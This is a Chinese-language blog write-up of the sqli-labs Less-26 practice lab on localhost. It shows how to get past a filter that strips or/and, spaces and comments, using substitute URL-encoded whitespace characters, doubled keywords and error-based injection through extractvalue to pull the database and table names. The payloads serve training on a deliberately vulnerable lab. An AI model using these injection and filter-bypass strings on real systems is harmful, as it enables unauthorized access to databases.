前言：

本關為sql注入系列第16關，此係類持續更新中，前面關卡可以參考此係列其他文章，如有錯誤的地方歡迎師傅指正，請看正文：

正文：

這是直接測試之後的結果，如果檢視原始碼可以發現，後臺不僅過濾了上一關的or和and，而且空格和註釋也過濾掉了。剛開始我自己進行測試的時候使用了其他url編碼的空字元，明明過濾後的語句有空格但是依然報錯，在百度過後才知道是阿帕奇的問題，不過可以在Linux裡面測試（我沒有試，直接用的報錯注入），使用報錯注入可以避免使用空格，可以代替空格的空字元如下：

%7f
%81
%8d
%8f
%a0
%a4
#也許還有其他的

注入語句如下：

http://localhost/sqli-labs-master/Less-26/

id=1’||extractvalue(1,concat(’~’,database()))||1='1

使用updatexml函式效果一樣，不瞭解的可以參考我前面的文章，接下來就繼續報表，由於這個語句有點麻煩所以講一下這個後面的參照就可以了：

正確回顯，不過注入的時候一定要仔細，我就因為括號的問題出錯了很多次（要細心哦）。

http://localhost/sqli-labs-master/Less-26/?id=1’||extractvalue(1,concat(’~’,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=‘security’))))||1='1

好了，後面的步驟都一樣，就不再贅述，感謝支援，後面會持續更新，加油~